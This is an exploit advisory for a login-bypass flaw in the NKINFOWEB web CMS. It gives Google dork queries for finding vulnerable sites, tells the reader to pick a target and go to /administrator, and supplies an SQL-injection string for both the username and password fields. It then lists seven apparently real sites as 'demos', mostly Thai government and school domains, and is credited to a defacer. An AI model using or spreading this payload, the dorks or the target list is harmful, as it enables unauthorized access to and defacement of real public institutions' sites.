=============================================================|
|
|-------------------In The Name Of God------------------------|
|
| Exploit Title : NKINFOWEB Bypass Login Vulnerability
|
| Exploit Author : Ashiyane Digital Security Team
|
| Google Dork 1 : intext:NKINFOWEB V3 demo
|
| Google Dork 2 : site:.th intext:NKINFOWEB
|
| Tested on : Win 7 / Google Chrome
|
| Date : 2017-08-10
|
| Vendor HomePage : http://www.nkinfoweb.org/
|
|======================================|
|
| Tutorial :
|
| Search The Dork And Select Your Target
| Then Go To Admin Panel At : /administrator
|
| Username: '=''or'
| Password: '=''or'
|======================================|
|
| Demos :
|
| http://ssk3.go.th/administrator/
| http://www.dongsomboon.go.th/administrator/
| http://www.dokkhamtai.go.th/administrator/
| http://bw3.bwschool.ac.th/administrator/
| http://www.nbwit.ac.th/administrator/
| http://drwit.sesao33.net/administrator/
| http://www.tratcc.ac.th/administrator/
|
|=============================================================|
| Discovered By : Cyber.Defacer
|=============================================================|